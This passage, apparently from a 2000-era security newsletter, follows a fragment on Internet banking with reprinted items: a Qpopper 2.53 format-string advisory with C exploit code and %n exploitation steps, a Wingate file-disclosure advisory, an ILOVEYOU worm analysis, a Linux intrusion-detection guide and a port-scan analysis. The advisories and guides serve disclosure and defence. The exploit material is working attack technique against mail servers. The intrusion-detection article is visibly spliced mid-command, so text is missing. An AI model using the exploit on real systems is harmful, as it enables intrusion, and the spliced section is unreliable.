unlike, say, an item of clothing, is a commodity that can actually be used, transferred and delivered electronically. Samuel Theodore, of Moody’s, a credit-rating agency, believes the banks are currently undergoing their “fourth disintermediation”. The first involved savings, and the growth of mutual funds, specialised pension funds and life-insurance policies at the expense of bank deposits; the second saw the capital markets take on some of the banks’ traditional role as providers of credit; in the third, advances in technology helped to streamline back-office operations. Now, in the fourth stage, the distribution of banking products is being disintermediated. This process has been going on for some years, with the spread of automated teller machines (ATMs) and, over the past decade or so, telephone banking and PC-based proprietary systems; but the Internet hugely enlarges its scope. Spotty youth Yet, except for one activity, share-trading, and one part of the world, Scandinavia, Internet-based financial retailing is, if not in its infancy, then scarcely at puberty. And wholesale banking, although it relies heavily on complex electronic trading systems and information technology, is still conducted mostly on closed proprietary networks. To be sure, there are some signs that the disintermediation the industry fears may be starting. Internet banks, with their low costs—and their dot.com habit of paying more attention to the acquisition of customers than the turning of profits—have drawn deposits away from offline banks in some countries. And in the capital markets, bond issues and share offerings have been syndicated and distributed over the Internet. Some highly rated borrowers have for years been borrowing through their own issues of commercial paper. The Internet can only enhance the appeal of do-it-yourself fund-raising. But these are just the early signs of an upheaval that is gathering momentum by the day. There are a number of reasons why many online financial services have been slow to catch on, and why they can now be expected to develop faster. Concerns about the security of Internet transactions, a particularly important issue for financial dealings, are gradually being eased. Internet use, even in the rich world, has been patchy, but is spreading fast. And whereas conducting financial transactions online up to now has often been clunky and annoying, the technology is improving all the time. Those technological advances are also liberating the Internet from the confines of the PC (see article). Most important, financial institutions themselves, which in the past have often resisted change, may now become its most ardent promoters. Having invested heavily in their own systems, banks were understandably reluctant to jettison them for web-based replacements. And adapting their own processes for the Internet has often proved cumbersome and difficult. Moreover, until recently banks faced little pressure from their customers to change what were seen as useful but boring services, much the same as electricity and gas. But soon, in many countries, customers will expect an online service as a matter of course. The banks’ staff, too, have been reluctant to abandon the old ways of doing things. Besides, those old ways have often been extremely profitable, so change threatens not just working habits, but the bottom line too. Now, however, almost every financial firm, from the swankiest Wall Street investment bank to the provider of microcredit to the very poor, has found that it has no choice but to invest in an “Internet strategy”. And having invested in it, it will need to persuade its customers to use it. So in areas where the advantages of doing business online may not be obvious to the consumer—notably in retail banking—the banks may find themselves trying to coax, bribe and bully reluctant customers online. The banks’ conservatism, on which they used to pride themselves, has become an embarrassment. It has also been spotted by the new breed of Internet entrepreneur taking aim at the banks’ business. The models are firms such as E*Trade and Charles Schwab, discount stockbrokers that found in the Internet a means of challenging even the biggest and most prestigious traditional firms. Now commercial and investment banks, fund managers and financial advisers are all vying with each other to present themselves as Internet-savvy, and boasting about their investment in online services. All this has created a strange, contradictory world. Clever young things with a bright idea and a few million dollars of venture capital behind them talk cheerily of the demise of traditional banks. Bill Gates, no less, said six years ago that banking is necessary, but banks are not. Now, the story goes, they are irredeemably hampered by their “legacy systems”—their existing management structures, staffing levels and computers—and by their “channel conflicts”—between what they do now, and online methods of sales and distribution. Their bosses simply do not “get it”. Or, even if they do, their institutions are so deeply rooted in the old economy and pre-Internet styles of business that there is no point in turning them around. The dinosaurs in the supposedly stuffy offices of these big banks and securities firms appear unaware that a meteorite may be on its way to obliterate them. On the contrary, resolutely upbeat online-service managers, often rather self-conscious in their tieless, suitless new-economy uniforms, claim they are having the times of their lives. Never has technology revealed so many new avenues for developing the business. It is, says Denis O’Leary, who runs Chase Manhattan’s Chase.com, “a golden age”. Not least because, in the industrialised West, many firms have been making bigger profits than ever. Years of economic expansion and bull markets have yielded good income from traditional lending, from trading and from investment. The only obvious cloud in the sky is that banks’ share prices seem not to reflect this (see chart 1). Indeed, in some countries, such as Britain, they imply that the market expects banks’ profits to collapse in the next few years. Even the stockmarket seems to believe the dot.com wannabes, and rewards them with much richer valuations than boring old-economy banks. Still kicking And yet this survey will argue that many of the older institutions have a good story to tell. The “legacy systems” at which the upstarts scoff have one big virtue: they have tended, by and large, to work. Big banks process trillions of dollars a day. It is almost inconceivable that they might close down for a few hours because some clever Internet saboteur has found a way of snarling up their technology (as has recently happened to some of the biggest websites). Existing banks have customers in numbers that newcomers can only dream of, and even unpopular incumbents benefit from their customers’ inertia. The Internet also brings established firms huge opportunities as well as threats. To take two important examples, it offers ways of cutting costs and of marketing products much more efficiently. For years, in America, Europe, Japan and elsewhere, the industry has been consolidating: bank after bank has been taken over by or teamed up with an institution in a complementary line of business. Usually, these deals are justified to shareholders by the extra returns that can be generated once overlapping costs are stripped out. The Internet, potentially, offers a way of taking a knife to whole layers of costs. Once a customer is convinced to carry out most of his transactions online, his account becomes much cheaper to administer. The other much-cited benefit of consolidation is “cross-selling”—of insurance policies to bank-account holders, for example. Yet so far this has rarely been all that successful in practice. The Internet can be a precision-guided marketing tool. For example, if you apply online for a credit card from NextCard, an American Internet operation, you will be offered a choice of three charging structures. To qualify for the most favourable, you have to transfer a certain outstanding balance from your other credit cards. That sum will—fancy that!—be the actual total of your other balances, which NextCard has just ascertained online from the credit bureaus. Or, in wholesale finance, suppose you are a potential investor in a company’s initial public offering of shares, and have just finished watching the boss boosting his company’s prospects on Merrill Lynch’s online investment-banking service. The phone rings. And yes, it is a Merrill Lynch salesman who knows you have been watching, and thinks that now may be the moment to clinch a sale. But, for banks, each of these pluses comes with a minus. Because costs are so much lower for Internet-based transactions, the barriers to entry are lower as well, which implies that margins will come under pressure. And although the Internet makes well-directed sales pitches easier, that is hardly compensation for the precariousness of online customer relationships. Once your client is on the Internet, he is only a mouse-click away from your competitor, and more and more financial sites, search engines and portals will be pushing competing products at him. That, too, will squeeze margins. Viewed from this perspective, for many financial institutions the Internet is a double bind. Embrace it, and you may still find yourself losing business, or at least seeing profit margins dwindle. But ignoring it could be terminal. This survey will argue that the pressures for change have become irresistible. It concentrates on places where the process is most advanced—America and Europe—but the same lessons apply everywhere. Big financial institutions are global firms. And on the Internet, change spreads like wildfire. The stockmarket with the highest proportion of Internet trading is not, as you might think, in New York, but in Seoul. To make the challenge for the industry even more daunting, the revolution also encompasses the very architecture of many of the world’s biggest financial markets. Stock, commodity and futures exchanges, clearing and settlement systems are also being forced to consolidate and modernise, to prepare for the day when financial transactions are settled instantaneously. In public, no bank boss these days would admit to anything less than whole-hearted enthusiasm for the online adventure. In private, however, some still see it as just another distribution channel, perhaps less important than others, such as the telephone. A few still cling to the dream that it is a fad they have to indulge because their shareholders seem to like it. Even such non-believers, however, are being forced by the market to formulate an online strategy. If they are too slow, or get it wrong, the consequences for their firms could be deadly. And if they still need convincing, they need only look at what has happened, in just four years, to stockbroking. http://www.qualisteam.com/eng/conf.shtml @HWA 228.0 [b0f] Qpopper exploit code ~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.digibel.org/~b0f/advisors/b0f5-Qpopper.txt _____________________________________________________________________ b u f f e r 0 v e r f l 0 w s e c u r i t y a d v i s o r y # 5 Advisory Name: Remote shell via Qpopper2.53 Date: 5/23/00 Application: Qpopper 2.53 for *NIX Vendor: Qualcomm Incorporated WWW: www.qualcomm.com Severity: can give users remote shell with gid=mail. Author: prizm (prizm@resentment.org) Homepage: b0f.freebsd.lublin.pl * Overview Qpopper is the most widely-used server for the POP3 protocol. This allows users to access their mail using any POP3 client. Qpopper supports the latest standards, and includes a large number of optional features. Qpopper is normally used with standard UNIX mail transfer and delivery agents such as sendmail or smail. * The Problem Yes, Qpop, again and again... There is a bug in version 2.53 of Qpop that can give you a remote shell with gid=mail. Problem is with euidl command which uses user input as format string for pop_msg() function. Lets examine following code from Qpop 2.53 source: --> pop_uidl.c, around line 150: ................ sprintf(buffer, "%d %s", msg_id, mp->uidl_str); if (nl = index(buffer, NEWLINE)) *nl = 0; sprintf(buffer, "%s %d %.128s", buffer, mp->length, from_hdr(p, mp)); ! return (pop_msg (p,POP_SUCCESS, buffer)); ^^^^^^^^^^^^^ ................. Function pop_msg() is declared in pop_msg.c as pop_msg(POP *p, int stat, const char *format,...), and here we have user-input as format string. Lame. Ok, back to problem, imagine following smtp session: MAIL FROM: 200 Ok RCPT TO: 200 Ok data 200 Okey, okey. end with "." Subject: still trust qpop?=/ X-UIDL: AAAAAAAAAAAAAAAA From: %p%p%p%p%p%p%p test . 200 BLABLABLA Ok, message accepted for delivery. Then, luser connects with his pop account and runs euidl command there: +OK QPOP (version 2.53) at b0f starting. <666.666@b0f> USER luser +OK Password required for luser. PASS secret +OK luser has 3 messages (1644 octets). euidl 3 +OK 2 AAAAAAAAAAAAAAAA 530 0xbfbfc9b00x804fd740xbfbfc9b00x2120x8052e5e0xbfbfd1e80x8057028 Yeah, thats from my box with FreeBSD. As you can see, our %p%p%p%p%p%p%p where implemented as arguments for vsnprintf() command. * Exploiting Is this possible? Yeah, sure! But there are some limits. Qpopper2.53 from FreeBSD ports with patches is much more difficult to exploit than one from linux. It is because freebsd patches change vsprintf() call in pop_msg.c to vsnprintf() call, and there is big difference between them. Qpopper with FreeBSD's patches IS exploitable. Exploit ------- /* qpop_euidl.c exploit by prizm/Buffer0verflow Security * * Sample exploit for buffer overflow in Qpopper 2.53. * This little proggie generates a mail u need to send. * * Standard disclaimer applies. * By the way, exploit is broken =) You need to insert shellcode. * * MAD greets to tf8 for pointing out the bug, and all other b0f members. * greets to USSRLabs and ADM * check http://b0f.freebsd.lublin.pl/ for news. */ #include #include char shellcode[]="imnothing"; int main(int argc, char *argv[]) { int i; unsigned long ra=0; if(argc!=2) { fprintf(stderr,"Usage: %s return_addr\n", argv[0]); exit(0); } sscanf(argv[1], "%x", &ra); if(!ra) return; if(sizeof(shellcode) < 12 || sizeof(shellcode) > 76) { fprintf(stderr,"Bad shellcode\n"); exit(0); } fprintf(stderr,"return address: 0x%.8x\n", ra); printf("X-UIDL: "); for(i=0; i < sizeof(shellcode);i++) printf("%c", shellcode[i]); printf("\r\n"); printf("From: %s", "%.1000d"); for(i=0; i < 50; i++) printf("%c%c%c%c", (ra & 0xff), (ra & 0xff00)>>8, (ra & 0xff0000)>>16, (ra & 0xff000000)>>24); printf("@test\r\n"); printf("Subject: test\r\n\r\nhuh?\r\n.\r\n"); return 0; } Exploiting QPOP from FreeBSD ports ---------------------------------- It is NOT easy, because vsprintf() is replaced with vsnprintf() so we can't overflow stack, but we still have control over it (remeber %n?). Im not going to post exploit for this because it is really generic, but I will explain theory on exploiting qpop with vsNprintf. There is an little trick with %n YOu should know. Try to understand why folowing code succeeds and prints out 2000, not sizeof(b): ------ #include int main(void){ int s=1; char b[1024]; int q; snprintf(b, sizeof(b), "%.2000d%n", 1, &q); return printf("%d, overflowed? %s\n", q, (s==1?"NO":"YES")); } ------ On my box with FreeBSD 3.4 i have: 2000, overflowed? NO Hah, first time i expected to see 1024, but YOu know that all is unpredictable . So, this little thing will help us a lot. Exploiting it: a) Find where in stack is located user input. b) Compose a message with filed X-UIDL and From: X-UIDL: ppRETARETARETARETA From: %.RETURNd%n@test where: "pp" is for padding (two or three chars) "RETA" is return address pointing to SHELLCODE "SHELLCODE" guess "RETURN" return address c) Exploit? If you need an exploit that will work on FreeBSD, code it yourself. * Vulnerable Versions 2.53(Others?) * Fix You can download Qpopper 3.1 at http://www.eudora.com/freeware/qpop.html#CURRENT which is not vulnerable to this problem. Or you can manually patch it by doing the following: At lines 150 and 62 from pop_msg.c, replace: - return (pop_msg (p,POP_SUCCESS, buffer)); to: + return (pop_msg (p,POP_SUCCESS, "%s", buffer)); copyright © 1999-2000 prizm, buffer0verfl0w security b0f.freebsd.lublin.pl @HWA 229.0 [b0f] Wingate advisory ~~~~~~~~~~~~~~~~~~~~~~ http://www.digibel.org/~b0f/advisors/b0f4-Wingate.txt _____________________________________________________________________ b u f f e r 0 v e r f l 0 w s e c u r i t y a d v i s o r y # 4 Advisory Name: Wingate History database file reading Date: 02/05/00 Application: Wingate 3.0.5 Vendor: Deerfield.com WWW: www.deerfield.com Severity: remote retrivial of history database file of the remote wingate server. Author: axess ( axess@mail.com ) Homepage: www.b0f.com * Overview Wingate is a software for internet sharing and are very common. * The Problem First i want to add, WinGate versions prior to 2.1 allowed Internet access by default. But after that version they changed it. In WinGate 3.0 Home there are no way to change it so people can access it from the internet. In Wingate 3.0 Standard and Pro you can change this bindings. By researching this i have found out that many "in the wild" allow connections from the internet and this problem affect many. If not accessable from the internet they are always accessed from the LAN that has it. So when connecting to the logfile server on port 8010 i found out that all the files in the "root" directory of the installed software can be read remotely. Nothing particular interesting besides the wingates administrator history file. It contains computer names, usernames and the activity of the users that logged in. How this information can be used you can figure out yourself. Besides that its a matter of privacy for the users using it that should be taken in mind. So we just fire our browser away to http://server.com:8010/ Now we can just add the file we want to download in this case http://server.com:8010/history.dbf * Vulnerable Versions I have tested the newiest version 3.0.5 on NT4.0. But im pretty sure all versions prior to it are vulnerable to the same problem. * Fix Close that stupid port that have always been a problem. copyright © 1999-2000 buffer0verfl0w security www.b0f.com @HWA 230.0 [b0f] ILOVEYOU Virus analysis and removal ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.digibel.org/~b0f/lamagra/analysis.txt Analysis of the LOVE-LETTER-FOR-YOU virus/worm ------------------------------------------------------------------------------------------------ The virus/worm hit Belgium and the rest of the world on Thursday 15/04/2000. A lot of important companies were struck including banks, factories and my dads work :).That's where I got the little bugger. The virus/worm is a big vbscript that spreads by email (smells like Melissa :)) and infects every script on your computer. Lifecycle ------------------------------------------------------------------------------------------------ All starts by opening an attachment on an email, then the script starts. It copies itself into: $windir/Win32DLL.vbs ($windir = c:\windows on most windows systems) $systemdir/MSKernel32.vbs ($systemdir = c:\windows\system) $windir/LOVE-LETTER-FOR-YOU.TXT.vbs Next it adds those files in the registry so they auto-start on boot. After that it changes the default page of internet explorer, that way it downloads an executable from a site when IE opens. If the file has already been downloaded it also adds that into the registry and changes the default page to "about:blank". Then it starts sending emails with the script attached to all the people in your addresslist Finally the big mess starts, the virus scans every harddisk and networkdisk for extentions: Vbs, vbe, js, jse, css, wsh, sct, hta, vbs, jpg, jpeg All files found are overwritten by the virus and when mp2's or mp3's are found it copies itself to a vbs script in the same directory. And when mIRC is found a small mIRC script is created which sends an html page, which tries to infect you using IE, to every user that joins a channel you're in. executable ------------------------------------------------------------------------------------------------ It cracks the share passwords and sends those + ipaddr by email to the creator of this virus (I couldn't get this program because the server was shutdown, thanks to G0Dfarter for checking it) Disinfection ------------------------------------------------------------------------------------------------ Open regedit and start deleting the malicious entries HKEY_LOCAL_MACHINE\Software\Microsoft\CurrentVersion\Run\MSKernel32 HKEY_HKEY_LOCAL_MACHINE\Software\Microsoft\CurrentVersion\RunServer\Win32DLL HKEY_HKEY_LOCAL_MACHINE\Software\Microsoft\CurrentVersion\Run\WIN_BUGSFIX Search for WIN-BUGSFIX.exe and remove it. Remove $dirsystem\LOVE-LETTER-FOR-YOU.HTM Check files with extensions: Vbs, vbe, js, jse, css, wsh, sct, hta, vbs, jpg, jpeg and check for infection, if so delete them (and replace them with the original). If you have mIRC is installed remove the script.ini file. Remove all the emails, maybe warn the people in your addresslist so they don't open the attachment. Prevention ------------------------------------------------------------------------------------------------ There is only 1 rule in these cases: do NOT open suspicious files The number one cause why this virus is so affective is that in windows everything is linked. You can control your entire computer from a simple wordmacro (and worst). The best thing to do is turn off all sorts of scripting in windows (if possible). Lamagra access-granted@geocities.com http://lamagra.seKure.de Member of b0f/buffer0verfl0w security http://www.b0f.com @HWA 231.0 [IND] Intrusion detection on Linux ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.securityfocus.com/focus/ids/articles/linux-ids.html Intrusion Detection on Linux by David "Del" Elson last updated Monday, May 22, 2000 RedHat Introduction This article focuses on several host-based intrusion detection systems that are available on Linux. In particular, I will cover some of the basics of installing setting up these packages, how they are useful, and in what circumstances they can be used. Systems Security 101 This article assumes a basic knowledge of systems security. In particular, I will assume that the most basic security measures have already been taken to secure a host against intrusion from the internet. These measures could include: Firewalling, to ensure that access to the various TCP and UDP ports of the system that were not intended for internet access are prevented. For example, a basic set of firewalling rules for a web server would ensure that the only TCP/IP access to the machine was on TCP port 80, the port normally used for HTTP access. Disabling daemons that are not required. For example: A web server normally needs a process running to serve web pages. Processes that are not associated with serving web pages, such as RPC/Portmap services, NFS services, X Font Server, DNS name server, and other extraneous and unused applications should be stopped or disabled. On a Red Hat Linux system, this is normally done by using one of the run level editors, for example ntsysv or tksysv, to disable the startup of any daemon or service that is not required. Disabling access to ports that are not required, by editing /etc/inetd.conf. Typically, a system will come pre-installed with access to many ports enabled in the /etc/inetd.conf file. Editing this file to remove or comment out any lines that are not required is the most basic system security activity and should be carried out on all systems. Lines of Defence Illustration 1: Multi Layered Systems Security In this article, I will discuss a multi-layered approach to systems security. Several security layers can be used independently to provide additional protection in case any of the layers should be breached. An example of a multi-layered security system is shown in illustration 1. Each layer in the diagram provides additional data protection to the layers above it. For example, the first layer is the firewall. Should an intrusion attempt not be defeated by the firewall, a second layer, the Port Sentry program, can provide additional protection. Further inside the security system are the LIDS and LogCheck programs, that provide additional protection should an intrusion attempt not be intercepted by the Port Sentry program. Monitoring Incoming Connections The first layer of protection behind the firewall is a software package that will monitor incoming attempts to connect to the machine. The PortSentry package (http://www.psionic.com/abacus/portsentry/) provides a simple and effective method of doing this. What does PortSentry do? PortSentry is a program that monitors activity on specific TCP/IP ports. Activity on the ports that are monitored by PortSentry is reported, and one of several options can be taken, including denying further attempts to access to your system from the source of the activity. This is an important defence mechanism, because a hacker will typically probe your system for weaknesses ("port scanning") before attempting an intrusion. Detecting the probe or port scan, and completely denying further access to your system by a potential hacker, robs that hacker of the ability to follow up on any port scans with a real intrusion attempt. Installing PortSentry For users of Red Hat Linux, PortSentry is available in RPM format on the Red Hat contrib FTP site. This site is mirrored in various locations around the world, check at www.redhat.com for the location of your nearest mirror. I haven't yet determined the availability of a .deb format package for PortSentry but I am sure there is one out there. For other Linux systems, installing PortSentry from the source code is relatively simple. Recommended Configuration PortSentry runs in a number of modes, including various TCP and UDP stealth modes. The mechanism that I prefer to use for running PortSentry is to bind it to a TCP port that (a) is not in use, and (b) is known in some systems to have potential for intrusion attempts. For example, port 143 (imap2), port 111 (portmap) and port 23 (telnet) are TCP ports that I do not use on my internet systems, and my web server was scanned on both of those ports in the last 24 hours. To start PortSentry in basic TCP mode, ensure that your system start-up scripts run this command somewhere: portsentry -tcp Also, ensure that the PortSentry config file (portsentry.conf) contains a TCP_PORTS line enabling scanning on the ports that you require. Response Options The "Response Options" section of the portsentry.conf file allows you to specify what response that PortSentry will take on detecting unwanted activity. The mechanism that I normally choose is to use ipchains to block further access from the source of the activity. This is done by uncommenting the following line in the portsentry.conf file: KILL_ROUTE="/sbin/ipchains -I input -s $TARGET$ -j DENY -l" On systems that receive a high level of port scanning activity, removing the "-l" at the end of the above line will prevent logging of further incoming connections, which might be useful to save space in the log files. Monitoring System Logs Firewalling systems, and software like PortSentry perform one useful function, in that they monitor and prevent connections coming in to unwanted ports on the system. This can prevent access to a system via a standard scan-and-intrude method. Where a system is required to run a particular service (eg: Apache on a web server, or BIND on a DNS server), and a hacker has uncovered a particular loophole in the service, these programs will unfortunately not achieve the result of keeping all intruders out of the system. A system acting as a DNS server that has a vulnerable copy of BIND running on it will eventually be discovered by a hacker that scans a wide range of machines for a single port (the DNS port) on each machine, and attempts intrusion against that port only. The firewall and PortSentry will unfortunately see this intrusion attempt as a legitimate access to the system. LogCheck LogCheck (http://www.psionic.com/abacus/logcheck/) is a useful program for scanning system logs for unusual activity. LogCheck works by scanning the various system log files (under Linux these are located in /var/log), and notifying the system administrator by e-mail if there is any unusual activity. Unusual messages in the log files can often be generated by intrusion attempts, or actual intrusions against your system. Installing LogCheck LogCheck is available in RPM format from the Red Hat contrib archives, and from the same sources as PortSentry. Installing LogCheck from the RPM file or from the source code (read the INSTALL file provided with the source code) is relatively simple. Configuring LogCheck LogCheck has four main configuration files. In the RPM version, these are stored in the /etc/logcheck directory. Normally, only the logcheck.ignore and the logcheck.violations.ignore files need modification. The normal process that I go through after installing LogCheck is as follows: Allow LogCheck to run once with the standard configuration files. This willl produce a large output file, which can be thrown away. 24 hours later, allow LogCheck to run again. This will detect any new entries in the log files since the last run, and will produce a smaller but still sizeable output file. Read this file carefully. For entries in the file that are of no great concern (use your judgement for this) find a specific identifying string in the entry. For entries that are in the "Security Violations" section, add the identifying string to the logcheck.violations.ignore file. For other entries (in the "Unusual System Events" section), add the string to the logcheck.ignore file. Repeat this process, once every 12 - 24 hours for approximately a week. By this stage, enough "bogus" entries will be filtered out by the strings that you have added to the .ignore files that the daily LogCheck report will contain only genuine system concerns. Note that the RPM file specifies that LogCheck is to be run hourly, but normally I only run it daily except on critical systems that need regular monitoring. This is done by moving the /etc/cron.hourly/logcheck file into /etc/cron.daily. Kernel Based Intrusion Detection Kernel based intrusion detection is a relatively new art form for Linux. The main kernel based intrusion detection system currently available is called LIDS, and is available from http://www.lids.org/. What is LIDS? LIDS is an intrusion detection and prevention system that resides within the Linux kernel. LIDS' protection is aimed at preventing the root user (who would normally have access to the entire system) from tampering with important parts of the system. LIDS' most important features include increased file system protection, protection against direct port access or direct memory access, protection against raw disk access, and protection of log files. LIDS also prevents certain system actions, such as installing a packet sniffer or changing firewall rules. LIDS Documentation The LIDS system is somewhat more complex to install than either PortSentry or LogCheck. Fortunately, the LIDS web site contains quite good documentation on the LIDS project, including installation and configuration instructions. Installing LIDS First, before installing LIDS, make sure that you have the most up to date LIDS patch (I am using 0.9), and the correct kernel version. I am using the updated kernel (2.2.14-12) from the Red Hat Updates FTP site, because this contains some security fixes. You also need the source code for the kernel that you are using. LIDS is currently targeted towards the 2.2.14 kernels. I installed LIDS on a Red Hat 6.2 system, this includes the 2.2.14 kernel. Before I installed LIDS, I obtained the updated kernel (from ftp.redhat.com/updates/ or one of its mirrors) and installed it according to the instructions at http://www.redhat.com/support/docs/howto/kernel-upgrade/kernel-upgrade.html. The next thing I obtained was the updated kernel source, which also came from ftp.redhat.com/updates/ This I installed using: rpm -Uhv kernel-source-2.2.14-12.i386.rpm Next, compile and install the lidsadm program: cd /usr/local/src/security/lids-0.9/lidsadm-0.9 make make install Generate a RipeMD-160 password that will later be installed into the kernel: lidsadm -P I entered the password "anypass" and got back the key "d502d92bfead11d1ef17887c9db07a78108859e8". Next, I copied the standard Red Hat configuration file for my architecture into the /usr/src/linux directory: cd /usr/src/linux/configs/ cp kernel-2.2.12-i686.config .. Next, I installed the LIDS patch using the following commands: cd /usr/src patch -p0 > /tmp/b mv /tmp/b /etc/inetd.conf killall -HUP inetd Reading through this file, we can note the following activity: A directory with an unusual name (/usr/lib/...) was created on the system. An FTP connection was made back to the hacker's personal machine (200.192.58.201, traced to a dial-in address somewhere in Brazil), and a simple hacker-kit was downloaded. The hacker kit was uncompressed. It contained trojan binaries which were then installed on the system. The trojan binaries were used to over-write the system versions of netstat, ps, tcpd, syslogd, and pstree. These are programs that get used to report on system activity, show running processes, show open ports, etc. A backdoor process of some kind (/usr/lib/pt07) was installed and started. Note that since the hacker has installed his or her own versions of ps, pstree, and netstat, this trojan is probably invisible to the system. What Can We Learn From This? Firstly, note that LIDS would not have prevented the actual break-in. The hacker obtained root access to the machine by connecting to and overflowing a buffer in a process that was running as root. Once the hacker had broken in, we can note how LIDS would have minimised the damage: LIDS, by using the CAP_LINUX_IMMUTABLE option, would have prevented the trojan binaries from being written to /bin, /usr/bin, /usr/sbin, and /usr/lib. These are directories that we would normally mark as immutable (chattr +i) and hence could not have been changed. Note that even without LIDS we can mark these directories as immutable using chattr +i, but LIDS prevents even the root user from tampering with the immutable flag. Similarly, the touch -t commands would have failed if the files were marked chattr +i. Even the very first line of the script, "mkdir /usr/lib/..." would have failed if the /usr/lib directory was marked immutable! Note that LIDS would not have prevented the break-in, but would have prevented the hacker from causing any significant system damage after the break-in. A backdoor process could have been installed (eg: the pt07 backdoor could have been placed in /tmp, or any other non-immutable directory), but the non-trojan versions of ps, netstat, and pstree would have detected this process fairly easily and we could have come back and killed it off. Without LIDS being installed we have no other real clues as to what the hacker might have done via this backdoor, and so our only available method to clean up the hacker's damage is to re-install the system completely. OpenWall and LIDS: An Extra Layer Another similar system to LIDS is the OpenWall project (http://www.openwall.com/linux/). The OpenWall project contains some different security features to LIDS, and one of the OpenWall patches in particular makes the stack area non-executable. An excerpt from the OpenWall README file states: Most buffer overflow exploits are based on overwriting a function's return address on the stack to point to some arbitrary code, which is also put onto the stack. If the stack area is non-executable, buffer overflow vulnerabilities become harder to exploit. Another way to exploit a buffer overflow is to point the return address to a function in libc, usually system(). This patch also changes the default address that shared libraries are mmap()'ed at to make it always contain a zero byte. This makes it impossible to specify any more data (parameters to the function, or more copies of the return address when filling with a pattern), -- in many exploits that have to do with ASCIIZ strings. Recently, the LIDS web site has contained some integrated LIDS + OpenWall kernel patches that apply the security features of both LIDS and OpenWall to the kernel in a single integrated patch set. Conclusions Using a set of layered security tools on the Linux system, it is possible to prevent a wide range of system attacks, and to protect your system against intrusion or tampering. A hacker's point of entry into your system will be the network interfaces, and protecting these, and under the network interfaces, the system kernel, can discourage many attacks and prevent others. Be aware of any potential security holes in your system. Any daemon or service running on your system, either as root or as a non-root user, can be a potential security threat. Be prepared to face attacks against these threats. David Elson (Del) is a security and technology consultant working for Wang New Zealand in Christchurch, on the South Island of New Zealand. With 15 years IT experience, he consults to various clients on security and networking issues. He also maintains a set of web pages on Linux and other related security topics, and has given talks on various security and networking issues at conferences in Australia and New Zealand. @HWA 232.0 [IND] scan.txt Spitzner gets an unusual scan. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Recently my network received an unusual scan, deciphering it has proven difficult. With some outstanding help from the security community, here is my best guess at what the scan is. THE SCAN -------- On 20 May, one of my systems received a unique scan from three systems. The three systems are: jive.rahul.net (192.160.13.4) bug.rahul.net (192.160.13.7) foxtrot.rahul.net (192.160.13.6) The scan signature is exactly the same from all three systems, they scanned ports 1-1024 (see signature below). Of these three systems, one is not active (jive.rahul.net) so we know for certain that at least one system was spoofed. The other two systems (bug and foxtrot) are up. This was confirmed both by hping and by the system owner, Rahul Dhesi However, I do not know if the two live systems were spoofed or not. --- snort snort --- 05/20-17:06:45.061034 192.160.13.4:31337 -> 172.16.1.101:1 TCP TTL:44 TOS:0x10 ID:242 ***FRP** Seq: 0xA1D95 Ack: 0x53 Win: 0x400 . . . 05/20-17:06:58.685879 192.160.13.4:31337 -> 172.16.1.101:1024 TCP TTL:44 TOS:0x10 ID:242 ***FRP** Seq: 0xA1D95 Ack: 0x53 Win: 0x400 --- snip snip --- THE TOOL -------- These packets were crafted by a tool, they were not created by a standard IP stack. We can determine this based on the following: 1. The Seq, Ack, and IP ID numbers are the same for all 1024 packets. An IP stack would have increasing numbers for all three. 2. Note the TCP flags, FIN, RST, and PSH. No standard IP stack would produce such a packet, nor would any IP stack respond with such a packet. Many people commented that this was Back Orrifice because the 31337 port, but that is not the case. First, BO uses UDP by default. Also, Dildog had this to say about the scan: "A bo2k scanner would never come -from- port 31337. Something might scan -you- for sockets listening on 31337, but not the other way around. Regardless, this would have been BO, not BO2K, since BO2K doesn't have a default port. This just looks like a regular port scan to me with a fixed local port." So, this scan was most likely done by a scanner that creates its own packets, but which one? Not nmap: Nmap does not have a FRP flag option. Nor does it use constant Seq, Ack, and IP ID numbers. Not hping: Hping can set most of the functionality of this scan, but it CANNOT set the Seq or Ack number. The best guess we have among the security community is these signatures were created by Libnet, some one has created their own packets. Why Libnet? To qoute Simple Nomad (and Aaron Campbell) "I thought these values looked familar. Took me a bit, but check out the sample programs that come with Libnet. In there you will find id 242, seq a1d95, ack 53, and a ttl of 48. Looks like someone was playing around trying to write a scanner of sorts using the Libnet sample progs as a starting point, and scanned you. So check every machine 4 hops away...." NOTE: I tried the traceroute 4 hops out, it was a router, most likely not our suspect :( So, based on what we know, our best guess is that Libnet was used to create these packets. PURPOSE OF THE SCAN ------------------- This is the most confusing part, the TCP Flags FRP do not generate a response, from open or closed ports. This has been tested on a variety of systems by a several people, inlcuding Max Vision, Dennis Ducamp, and myself. So why run a scan when you won't get any results? I do not know. Maybe someone was testing their coding or scanning skills. Perhaps they were trying "man-in-the-middle" scan techniques. We may never know :( K2 from ADM CREW has an interesting theory "Well, not really, what if your not using the TCP/IP stack of the OS but rather something like libpcap backdoor and are looking for weirdo options ( this will enable you to communicate through onto a firewall'd system )... he dose use libnet to communicate with it so it lead's me to believe that he wants to have a sub-carrier connection that is not normally valid. Source port significance is a really good way to authenticate to a backdoor (ip independent), and can be detected by the trojan early (able to bypass system logging). Exactally, libpcap based backdoor with a libnet based client to pipe i/o to the backdoor... I dont know why they would scan all the ports other then to assume that the backdoor on the host may modulate the port it's listening on... also, a system like this could listen on a port already allocated by the system like even if telnetd is running... you can still contact your backdoor on port 23 because your connect to that port is not valid to anything that the system would have there (your basically going up your libpcap stack insted of the OS), this also helps get past any host firewall." A comment from the system owner Rahul Dhesi, who has been extremely helpful with this analysis. "Hi, I don't see any obvious signs of a break-in on bug.rahul.net or foxtrot.rahul.net. Also, they are running different OSs: foxtrot is SunOS 4.1.3_U1, while bug is FreeBSD 3.4-STABLE. It seems doubtful to me that somebody would break into two machines running different OSs at around the same time. if somebody really broke into one of them, he would likely attack other machines on the network running the same OS. So I'm guessing that all packets were spoofed." Side note, FRP packets are not entered in the state table for FW-1 firewall. Even though the packet may be accepted and logged, the packet would not enter the FW-1 state table. ADDENDUM -------- If you have any comments or words of wisdom you would like to add, please email me at Lance Spitzner . Also, I have posted the raw data (tcpdump/snort binary format>. You can download it at http://www.enteract.com/~lspitz/scan.gz Thanks to the following people for their help and ideas: Nelson Murilo Bill Pennington Aaron Campbell Denis Ducamp Simple Nomad K2 ADM CREW ... and the many others who sent their ideas @HWA 233.0 [IND] local ssh 1.2.27 dos attack. 